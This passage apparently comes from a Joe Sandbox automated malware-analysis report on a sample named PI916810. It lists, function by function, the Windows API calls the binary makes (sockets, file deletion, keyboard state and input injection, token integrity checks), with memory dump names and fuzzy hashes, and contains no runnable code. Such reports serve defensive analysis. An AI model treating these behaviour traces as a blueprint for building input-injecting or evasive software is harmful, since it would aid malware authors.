                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Variant$AllocClearCopyInitString
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2808897238-0
                                                                                                                                                                            • Opcode ID: 5c662c80853b5376e2e5dc93f74aa0b5fa5ac214f9d87f754c31b44fe95ff1ad
                                                                                                                                                                            • Instruction ID: 9fc8dbcac30dd3ab72a14bcade7bff1d5fd3f5cb84eb0f4313732db9d6888239
                                                                                                                                                                            • Opcode Fuzzy Hash: 5c662c80853b5376e2e5dc93f74aa0b5fa5ac214f9d87f754c31b44fe95ff1ad
                                                                                                                                                                            • Instruction Fuzzy Hash: 0851EC306043019ADB20AF66D491ABEB3E5AF44314F208C1FF556CB691DF7C9844DB2E
                                                                                                                                                                            Function 004E9A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetWindowRect.USER32(00D3E300,?), ref: 004E9AD2
                                                                                                                                                                            • ScreenToClient.USER32(00000002,00000002), ref: 004E9B05
                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 004E9B72
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3880355969-0
                                                                                                                                                                            • Opcode ID: a59067e5198a4368b5f4da3862d6c53d7c66780649d4f2da4fbe65bb118e52a2
                                                                                                                                                                            • Instruction ID: 7ecfd8181611799c0550f0bebe1babe3d4c3f5d075ec1853867dec0099bb3c88
                                                                                                                                                                            • Opcode Fuzzy Hash: a59067e5198a4368b5f4da3862d6c53d7c66780649d4f2da4fbe65bb118e52a2
                                                                                                                                                                            • Instruction Fuzzy Hash: 46513C34A00289AFCF24DF69D8809AE7BB5FF55321F14826AF8159B3D1D734AD41CB94
                                                                                                                                                                            Function 004D6CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 004D6CE4
                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 004D6CF4
                                                                                                                                                                              • Part of subcall function 00469997: __itow.LIBCMT ref: 004699C2
                                                                                                                                                                              • Part of subcall function 00469997: __swprintf.LIBCMT ref: 00469A0C
                                                                                                                                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 004D6D58
                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 004D6D64
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast$__itow__swprintfsocket
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2214342067-0
                                                                                                                                                                            • Opcode ID: e71e309e998f62e1b85831b3cc438a795a3fc4271c8644bc4c61ab9acb126fba
                                                                                                                                                                            • Instruction ID: c81f1959b7e8ce494d211ed4340828245d3b895e0c1a15dd1d73f0a5d3b81ffb
                                                                                                                                                                            • Opcode Fuzzy Hash: e71e309e998f62e1b85831b3cc438a795a3fc4271c8644bc4c61ab9acb126fba
                                                                                                                                                                            • Instruction Fuzzy Hash: D24196747402006FEB10AF25DC86F3A77E99B04B14F44801EFA599B3D3EBB99C01875A
                                                                                                                                                                            Function 004D672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,004EF910), ref: 004D67BA
                                                                                                                                                                            • _strlen.LIBCMT ref: 004D67EC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _strlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4218353326-0
                                                                                                                                                                            • Opcode ID: 56616302040ad68df57c50a733510d05c0927115496392b20145629ababea55a
                                                                                                                                                                            • Instruction ID: 40e7e8e288b608acf1dfa367c628f7fcf2d3f0185176a099a05f3ac46dc8ce3f
                                                                                                                                                                            • Opcode Fuzzy Hash: 56616302040ad68df57c50a733510d05c0927115496392b20145629ababea55a
                                                                                                                                                                            • Instruction Fuzzy Hash: 7641F830A00104ABCB14FBA5CCD1EAEB3A8AF08318F15816FF81597392EB78AD05C759
                                                                                                                                                                            Function 004CBA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 004CBB09
                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 004CBB2F
                                                                                                                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 004CBB54
                                                                                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 004CBB80
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3321077145-0
                                                                                                                                                                            • Opcode ID: 2bb213aa5ff3390db36a79a11eaefb381e23f07fcc507d7c98f034231fc02716
                                                                                                                                                                            • Instruction ID: af44db900ec21164390c47702063d6c823245afe9256fc930d83d8091655cfa4
                                                                                                                                                                            • Opcode Fuzzy Hash: 2bb213aa5ff3390db36a79a11eaefb381e23f07fcc507d7c98f034231fc02716
                                                                                                                                                                            • Instruction Fuzzy Hash: 01417B39600650DFCB10DF15C485A1DBBE5EF49314B08809EEC4A9B762DB78FC04CB9A
                                                                                                                                                                            Function 004E8AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004E8B4D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InvalidateRect
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 634782764-0
                                                                                                                                                                            • Opcode ID: e99b7fcc0260ef5eeb062411f18c402438515b1e28000699f1461ec48acce4cd
                                                                                                                                                                            • Instruction ID: 1f42e8f98705d20297e9875efbb69da661eb6437d9a8b42f948f7bf949be5e6c
                                                                                                                                                                            • Opcode Fuzzy Hash: e99b7fcc0260ef5eeb062411f18c402438515b1e28000699f1461ec48acce4cd
                                                                                                                                                                            • Instruction Fuzzy Hash: 0B310A74600284BFEF208F1ACC85FAA37A1FB05312F14461BF659D63E1CE38B9419749
                                                                                                                                                                            Function 004EADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ClientToScreen.USER32(?,?), ref: 004EAE1A
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004EAE90
                                                                                                                                                                            • PtInRect.USER32(?,?,004EC304), ref: 004EAEA0
                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 004EAF11
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1352109105-0
                                                                                                                                                                            • Opcode ID: e5ac47bd90ae9e95220745c4caef958cfca613dea17c632caea3e2112ceb75a5
                                                                                                                                                                            • Instruction ID: f669673b17a4a6c56c8104ffd909d4e47cd4e7b63a194ffb46e63fe9c79c006a
                                                                                                                                                                            • Opcode Fuzzy Hash: e5ac47bd90ae9e95220745c4caef958cfca613dea17c632caea3e2112ceb75a5
                                                                                                                                                                            • Instruction Fuzzy Hash: 0941AE70600199DFCB21CF6AC884B6A7BF5FF59302F1881AAE8149B351C734B816DF96
                                                                                                                                                                            Function 004C0FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 004C1037
                                                                                                                                                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 004C1053
                                                                                                                                                                            • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 004C10B9
                                                                                                                                                                            • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 004C110B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 432972143-0
                                                                                                                                                                            • Opcode ID: 0f5f9e6cab7e3dac2ae8be210f6ac7e79167bccb0b2aefeb5750260bdbf446fc
                                                                                                                                                                            • Instruction ID: 33fcef96461320ea546d85a703ac0baf2c4cd7bef051521d9f75a40e3d5cade3
                                                                                                                                                                            • Opcode Fuzzy Hash: 0f5f9e6cab7e3dac2ae8be210f6ac7e79167bccb0b2aefeb5750260bdbf446fc
                                                                                                                                                                            • Instruction Fuzzy Hash: 87311C34940688AAFB708A678C05FFAB7A5AB47310F04422FE541566E3C37D49C5975E
                                                                                                                                                                            Function 004C1121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 004C1176
                                                                                                                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 004C1192
                                                                                                                                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 004C11F1
                                                                                                                                                                            • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 004C1243
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 432972143-0
                                                                                                                                                                            • Opcode ID: 043d19f70f97bd7bcd8c54115689acc430d2baf022aeadb9271c041412e347ad
                                                                                                                                                                            • Instruction ID: 4ffe83c2f32101b934c0850a6cf001159818c31916e4f42c9aa2459a1916b6a0
                                                                                                                                                                            • Opcode Fuzzy Hash: 043d19f70f97bd7bcd8c54115689acc430d2baf022aeadb9271c041412e347ad
                                                                                                                                                                            • Instruction Fuzzy Hash: 81312B38940648AAEF748A658C08FFBBB69AB4A310F18435FE590922F3CB3C4955975D
                                                                                                                                                                            Function 00496415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0049644B
                                                                                                                                                                            • __isleadbyte_l.LIBCMT ref: 00496479
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 004964A7
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 004964DD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3058430110-0
                                                                                                                                                                            • Opcode ID: be5dd6e039b8f35b7d2ef6a229e616abcde0fec56d5dcdbb748a62dd3c419855
                                                                                                                                                                            • Instruction ID: 44f2c8cbf8e1f4431426b04dd9764193d7e0d68c48283d0700e058b34e440841
                                                                                                                                                                            • Opcode Fuzzy Hash: be5dd6e039b8f35b7d2ef6a229e616abcde0fec56d5dcdbb748a62dd3c419855
                                                                                                                                                                            • Instruction Fuzzy Hash: 1A31B031600246AFDF218FB5CD45BAB7FA9FF41310F16443AE85487291E739E851DB98
                                                                                                                                                                            Function 004E5175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 004E5189
                                                                                                                                                                              • Part of subcall function 004C387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004C3897
                                                                                                                                                                              • Part of subcall function 004C387D: GetCurrentThreadId.KERNEL32 ref: 004C389E
                                                                                                                                                                              • Part of subcall function 004C387D: AttachThreadInput.USER32(00000000,?,004C52A7), ref: 004C38A5
                                                                                                                                                                            • GetCaretPos.USER32(?), ref: 004E519A
                                                                                                                                                                            • ClientToScreen.USER32(00000000,?), ref: 004E51D5
                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 004E51DB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2759813231-0
                                                                                                                                                                            • Opcode ID: f514d46ac01edcd7bb3dd99aca7bfbaddd5fb46a693da51c3ea2b9df4de6ee95
                                                                                                                                                                            • Instruction ID: aa3d4a33eed3c0c641d2b25f08826d58d795d7334d1714be691f19e8adf44c73
                                                                                                                                                                            • Opcode Fuzzy Hash: f514d46ac01edcd7bb3dd99aca7bfbaddd5fb46a693da51c3ea2b9df4de6ee95
                                                                                                                                                                            • Instruction Fuzzy Hash: B9312E71900148AFDB04EFA6C8859EFB7FDEF98304F10406AE415E7241EA799E05CBA5
                                                                                                                                                                            Function 004EC788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00462612: GetWindowLongW.USER32(?,000000EB), ref: 00462623
                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 004EC7C2
                                                                                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0049BBFB,?,?,?,?,?), ref: 004EC7D7
                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 004EC824
                                                                                                                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0049BBFB,?,?,?), ref: 004EC85E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2864067406-0
                                                                                                                                                                            • Opcode ID: 494383591c4903c1ccade21bd8a6935359dfdd76a7675e931fd4b70fb37ca4c3
                                                                                                                                                                            • Instruction ID: 7740ab2292621e45dccf01df6c1ecba9dea32745cea69a0a2e75c984c5ab23e8
                                                                                                                                                                            • Opcode Fuzzy Hash: 494383591c4903c1ccade21bd8a6935359dfdd76a7675e931fd4b70fb37ca4c3
                                                                                                                                                                            • Instruction Fuzzy Hash: 01315E35600098AFCB259F59C8D8EAA7BB6FB49312F04406AF9058B262C7359952DB68
                                                                                                                                                                            Function 00480BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __setmode.LIBCMT ref: 00480BF2
                                                                                                                                                                              • Part of subcall function 00465B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,004C7B20,?,?,00000000), ref: 00465B8C
                                                                                                                                                                              • Part of subcall function 00465B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,004C7B20,?,?,00000000,?,?), ref: 00465BB0
                                                                                                                                                                            • _fprintf.LIBCMT ref: 00480C29
                                                                                                                                                                            • OutputDebugStringW.KERNEL32(?), ref: 004B6331
                                                                                                                                                                              • Part of subcall function 00484CDA: _flsall.LIBCMT ref: 00484CF3
                                                                                                                                                                            • __setmode.LIBCMT ref: 00480C5E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 521402451-0
                                                                                                                                                                            • Opcode ID: 88a4119f63e6573005de3778d20e1263b8f9d7432d427ffab9fb160ca6948f7f
                                                                                                                                                                            • Instruction ID: 77172636968418767368bc6bd1aea6451ebe5fbcaf14c2206642c1a79e99c6f0
                                                                                                                                                                            • Opcode Fuzzy Hash: 88a4119f63e6573005de3778d20e1263b8f9d7432d427ffab9fb160ca6948f7f
                                                                                                                                                                            • Instruction Fuzzy Hash: 151154729042086ACB08B7B69C42ABE7B689F81324F14051FF20457292EE3C1D4A83AE
                                                                                                                                                                            Function 004B8B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004B8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 004B8669
                                                                                                                                                                              • Part of subcall function 004B8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 004B8673
                                                                                                                                                                              • Part of subcall function 004B8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004B8682
                                                                                                                                                                              • Part of subcall function 004B8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 004B8689
                                                                                                                                                                              • Part of subcall function 004B8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004B869F
